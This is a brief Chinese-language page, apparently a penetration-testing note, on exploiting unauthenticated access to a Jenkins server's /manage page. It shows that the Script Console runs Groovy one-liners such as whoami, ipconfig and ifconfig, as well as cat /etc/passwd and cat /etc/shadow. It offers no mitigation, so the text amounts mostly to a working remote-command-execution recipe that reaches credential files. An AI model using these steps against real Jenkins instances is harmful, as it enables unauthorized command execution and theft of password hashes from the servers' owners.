下载地址http://mirrors.jenkins.io/debian/

Jenkins(8080)未授权访问

测试

浏览器访问http://localhost:8080/manage可以直接访问

Jenkins(8080)未授权访问

点击脚本命令行

Jenkins(8080)未授权访问

println "whoami".execute().text

Jenkins(8080)未授权访问

windows

println "ipconfig /all".execute().text

linux

println "ifconfig -a".execute().text

println "cat /etc/passwd".execute().text

println "cat /etc/shadow".execute().text

相关文章:

  • 2021-11-27
  • 2021-05-21
  • 2021-11-09
  • 2021-09-27
  • 2021-07-25
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-08-04
  • 2022-01-17
  • 2022-12-23
  • 2021-11-10
  • 2021-10-19
  • 2021-09-26
相关资源
相似解决方案